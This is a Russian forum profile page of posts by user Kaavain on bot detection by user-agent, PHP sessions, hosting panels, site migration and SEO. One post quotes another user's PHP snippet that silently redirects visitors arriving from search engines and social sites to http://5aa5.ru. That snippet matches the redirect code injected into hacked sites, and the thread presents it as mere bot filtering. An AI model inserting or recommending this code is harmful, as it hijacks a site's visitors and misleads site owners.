Kaavain

Kaavain
Рейтинг
178
Регистрация
28.07.2015

Вот мысль пришла, никто не заморачивался? Есть подозрение, что 99% useragent ботов содержит подстроку "http" как часть ссылки на своих хозяев. В то же время 99% useragent браузеров - НЕ содержат, по крайней мере мне удалось найти лишь ОДИН браузер - какой-то никому не известный QtWeb, у которого есть. Ну еще у одной древней Оперы правда.

Вот и я думаю, так можно сократить проверку о ОДНОГО условия (ну плюс еще одно - мое специфичное UptimeRobot)..

Да, знаю, 

LEOnidUKG #:
Вам кажется. Всё нормально с производительностью у неё

... но птичка по зернышку клюет. 

Vincent_ #:

В целом для вашего сайта отрицательный рост по видимости в яндексе и внешним ссылкам уже год, возможно и дольше. Те ссылки, что есть это форумы и подобное. Как я и писал выше, по моему мнению, нужны жирные беки и еще добавлю, чтобы число ссылок на сайт всегда увеличивалось. И это снизит вероятность фильтра.

Можно иметь самый крутой, вылизанный сайт с кучей ассортимента и лучшим сервисом, но без продвижения он не будет в топах.

В топах пф, ссылки, редики.

И это - неправильно и не может продолжаться вечно. 

Mik Foxi #:

о чем? кто следит за панелями, тот знает, что веста давно умершая и не обновляющаяся панель, хестия тоже уже люди выдохлись поддерживать ее бесплатно, это две заброшки, в которых не исправлено куча косяков из старого и уже выявленного. к сожалению таков финал у всего, что делается на энтузиазме, а не за деньги с четким бизнес планом.

Продаваны впаривают ISPmanager…

https://github.com/hestiacp/hestiacp/blob/main/CHANGELOG.md

Последнее обновление 2 мес назад. 

По Весту не спорю. 

LEOnidUKG #:
и живём дальше.

Ну вот так я и сделал... Хотел еще блин сделать так, чтобы не каждый хит у меняsession.save_path перезаписывалось, но не срослось влет, забил :-)

vitaliy11 #:
А зачем вообще для ботов стартовать сессию?

Ну потому что у меня session_start() в стопицот местах засунуто. Проще их по хрону чистить. Еще раз - сайту столько лет, сколько половина из вас в сознательном возрасте не жило.

vitaliy11 #:
Да и вообще, сессии для такого длительного хранения не предназначены.

См. выше. У меня время жизни неактивной сессии (опять же, через хрон-самодельный gc) 1мес, соответственно активная - вечна. Нельзя клиенту корзину обнулять.

Залогиненные юзеры у меня могут в БД корзину отправить, это да. Но залогиненых 30%.

Mik Foxi #:
никогда небыло и нету проблемы. архивируете файлы сайта, архивируете дамп базы. Переносите. Все. Сложностей вообще ноль.

Если бы. Переезжал раза 3 за 18 лет... 

1. Настройки всяческие mysql, nginx и прочая. Ну ладно, не так критично, можно в процессе настроить.

2. 10/10 по mailtester я каждый раз добиваюсь совсем не сразу, приходится возиться.

3. Что меня сейчас больше всего удручает - imap ящики почтовые, где у меня лежат важные письма начиная с лохматых годов... Что-то на локальной в архиве аутлука, да, но многие в imap... Можно ли тупо скопировать /.maildir в exim???

Последний раз я переезжал, когда ihor резко умер, там уже было не да перфекционизма, поэтому даже не помню, как прошло - был счастлив что бэкап был удаленный и 24 часа давностью... Да и переехал - опять же будь проклят этот ISPmanager, на него же - тупо развернув бэкап... Кстати, похоже в нем же и почта была....

LEOnidUKG #:
а точно ли надо стартовать сессию для каждого захода

Да конечно - нет. Но сайту 18 лет, написан но с использованием register_globals и в сессии хранятся много чего - включая языковые переменные. По-хорошему, конечно же, переделать надо. Но работает и хорошо работает, фигли лезть. Только вот с сессиями заморочки, но решаемые же.

Может он и отличный. Но для 90% избыточный и бесполезный. 
Кого в Гугле не забанили - найдет целые простыни, где спецы доходчиво объясняют, почему ISPmanager - отстой. 
И при этом очень грязно играют, если бы переход на другую панель не был таким муторным, то ветром сдуло бы с них спесь. 
И все помнят их кидок с вечными лицензиями? Опять же - поищите как красиво людей надули, в Гугле много этого. 

Обратите внимание, как топят за него продаваны, и как мало защитников среди юзеров. Это и есть вся правда про ISPmanager. 
Виктор Горняков #:
error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://5aa5.ru");
exit(); } } }}

Гложат меня смутные сомнения...

1. У меня в худшем случае 3 вызова stripos , а в твоем примере 17 вызовов stristr, который по версии стековерфлоу еще и медленнее. На 10%, но все же.

2. Я исхожу из предположения, что юзерагенты ботов содержат "bot", а юзерагенты юзеров НЕ содержат, и в свое время нашел одного отщепенца "Slurp", вот теперь похоже еще один "crawler".

Мой метод проще и быстрее, или я не прав?

Vladimir #:
Так, думаешь с СЧ и НЧ у тебя все нормально?

До сентября даже +купить в яндексе было топ-10, теперь в ж.

НЧ у меня все шоколадно, так как у меня 7000 товаров моей ниши, а у самого наикрутейшего конкурента (причем он даже не в России) - 2500. Поэтому любой запрос [мой товар] + [конкретика] с вероятностью 99% мой. По СЧ тоже нормально типа [мой товар] + [подкатегория] ТОП 3-10...

Я, правда, давно подозреваю, что ВЧ бессмысленно, никто так не ищет. Началось это лет 10 назад, с появлением поисковых подсказок...

Всего: 1296